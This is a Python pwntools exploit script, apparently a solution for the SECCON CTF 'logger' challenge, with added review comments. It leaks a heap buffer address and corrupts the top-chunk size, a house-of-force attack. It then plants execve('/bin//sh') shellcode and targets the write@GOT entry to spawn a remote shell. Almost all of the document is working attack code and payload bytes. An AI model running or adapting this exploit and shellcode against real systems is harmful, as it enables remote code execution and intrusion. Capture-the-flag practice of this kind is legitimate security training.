'''
with zzoru.
extremely LIBC-specific exploit.
1/16 chance to get shell.
'''
from pwn import *
import os
import random
DEBUG = True  # NOTE(review): never read in the visible script (and debug() is never called)
context(os='linux',arch='amd64')  # pwntools target settings; p64()/u32()/pack() below encode for little-endian amd64
#p1 = process("./logger")
p1 = remote('logger.pwn.seccon.jp', 6565)
#p2 = process("./logger")
p2 = remote('logger.pwn.seccon.jp', 6565)
# NOTE(review): neither of these two sockets is used or closed before the
# script reconnects and rebinds p1 and p2 further down, so both are leaked.
R = str(random.randrange(10000))  # per-run suffix for the throwaway account name/password; `random` is not a CSPRNG, so do not reuse this pattern for anything secret
def login(process):
    """Authenticate on the target service over the given pwntools tube.

    Picks menu option '1', answers the 'Name :' and 'Password:' prompts with
    the per-run credentials derived from the module-level nonce R, and
    returns once the menu (ending in '4. exit') has been printed again.
    Presumably option '1' is the login/registration entry of the menu --
    confirm against the service banner, which this helper never prints.
    """
    global R  # R is only read here, so this declaration is redundant
    name = 'zzoru'+R
    password = 'zzoru5'+R
    process.sendline('1')
    process.recvuntil('Name :')
    process.sendline(name)
    process.recvuntil('Password:')
    process.sendline(password)
    process.recvuntil('4. exit')  # consume the rest of the menu so the caller starts at a clean prompt
def debug(process, address):
    """Attach gdb to `process` with a breakpoint at `address`, then block.

    raw_input() (Python 2) waits for Enter so the debugger can be set up
    before the script continues. Presumably meant for the commented-out
    local process('./logger') tubes rather than the remote() ones this
    script opens; it is not called anywhere in the visible flow.
    """
    gdb.attach(process, 'b *0x%x' % address)
    raw_input()
def read_log(process):
    """Select menu option '1' and dump up to 4096 bytes of the reply to stdout.

    A single recv() call: a long or slow response may come back truncated,
    and nothing is parsed -- the output is only for eyeballing.
    """
    process.sendline('1')
    print '=== log ==='
    #print process.recvuntil('1. Readlog')
    print process.recv(4096)
def write_log(process,size, log):
    """Select menu option '2' and submit a log entry of the given `size`.

    Answers the 'Log size(max 128byte):' prompt with `size` as decimal text
    and, only when size > 0, follows it with `log`. The helper itself does
    not enforce the 128-byte maximum the prompt advertises, and the callers
    below pass both full-size buffers and a size computed from a leaked
    address that may turn out non-positive; whatever validation exists
    lives on the server side.
    """
    process.sendline('2')
    process.recvuntil('Log size(max 128byte):')
    process.sendline(str(size))
    if size > 0:
        process.sendline(log)  # no body is sent for a non-positive size
#process.recvuntil('4.exit')
def buf_leak(process):
    """Read the 4 raw bytes the service echoes after 'filename: ' and return them as an int.

    Walks the menu with option '3' twice: the first pass is consumed up to
    '4. exit' plus one line, the second is read up to the 'filename: '
    prompt. Up to 32 bytes of the filename are printed, then the next 4
    bytes are unpacked little-endian. If the 4th byte is 0x3d ('=') it is
    treated as a delimiter rather than part of the value and only the low
    3 bytes are used, zero-extended. Only 4 bytes are recovered here; an
    earlier 8-byte variant is left commented out below.
    """
    process.sendline('3')
    process.recvuntil('4. exit')
    process.recvline()
    process.sendline('3')
    process.recvuntil('filename: ')
    print '[+] filename : %s ' % process.recv(32)  # recv(32) returns whatever is buffered, up to 32 bytes
    # leak = process.recv(8)
    # if len(leak) == 8:
    # buf = u64(leak)
    # print 'buf addr: = 0x%x' % buf
    # return buf
    # else:
    # print 'leak error ' + enhex(leak)
    leak = process.recv(4)
    print enhex(leak)
    if leak[3] != '\x3d':
        buf = u32(leak)
    else:
        buf = u32(leak[0:3]+'\x00')  # drop the trailing '=' and zero-extend the remaining 3 bytes
    print 'buf addr: = 0x%x' % buf
    return buf
write_got = 0x602020  # fixed address, so the target is presumably a non-PIE binary; the name suggests its write@GOT slot -- confirm against the binary
shell_code = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"  # raw amd64 machine-code blob (contains the string '/bin//sh'); not decoded here
os.system('rm /tmp/logger/*')  # shell invocation with a fixed command string; clears a local path, presumably state left by the commented-out local process() runs -- confirm it is still needed when only remote() tubes are used
#p1 = process('./logger')
p1 = remote('logger.pwn.seccon.jp', 6565)  # rebinds p1; the socket opened at the top of the file is leaked
login(p1)
#write_log(p1, 128, p64(write_got+0x8) + shell_code + '\x90' * (128-8-len(shell_code)))
# Stage 1: a single 128-byte entry built from three marker qwords, a fixed
# address, the code blob padded with 'z' to 72 bytes, and a two-byte tail;
# the rest of the 128 bytes is NUL padding.
payload = p64(0x41414141)
payload += p64(0x42424242)
payload += p64(0x43434343)
payload += p64(0x602040)
payload += (shell_code + 'z'*(72-len(shell_code)))
payload += '\x20\xa4'
#payload += shell_code
write_log(p1, 128, payload + '\x00' * (128-len(payload)))
write_log(p1, 128, 'b' * 128)  # second full-size entry
#write_log(p1, -1, 'A')
#p1.interactive()
p1.recvline()
p1.close()
sleep(.1)
#p1 = process('./logger')
p1 = remote('logger.pwn.seccon.jp', 6565)
#p2 = process('./logger')
p2 = remote('logger.pwn.seccon.jp', 6565)  # rebinds p2; the p2 opened at the top of the file is never closed
login(p1)
login(p2)
topchunk_size = 0xffffffffffffffff  # all-ones size field; the name is the only hint of its meaning
buf_addr = buf_leak(p2)
write_log(p1, 32, pack(topchunk_size) + pack(topchunk_size))  # pack() gives 8 bytes each under the amd64 context, i.e. 16 bytes sent for a declared size of 32
sleep(.5)
read_log(p2)
print hex(buf_addr)
sleep(.5)
# The size here is derived from the 4-byte leak; if it comes out non-positive,
# write_log sends only the size and not 'AAAA'.
write_log(p2, write_got-8*2-buf_addr-0x100-0x10, 'AAAA' )
p2.sendline('1')
p2.sendline('ls -al')  # one command sent blind, then the tube is handed to the user
p2.interactive()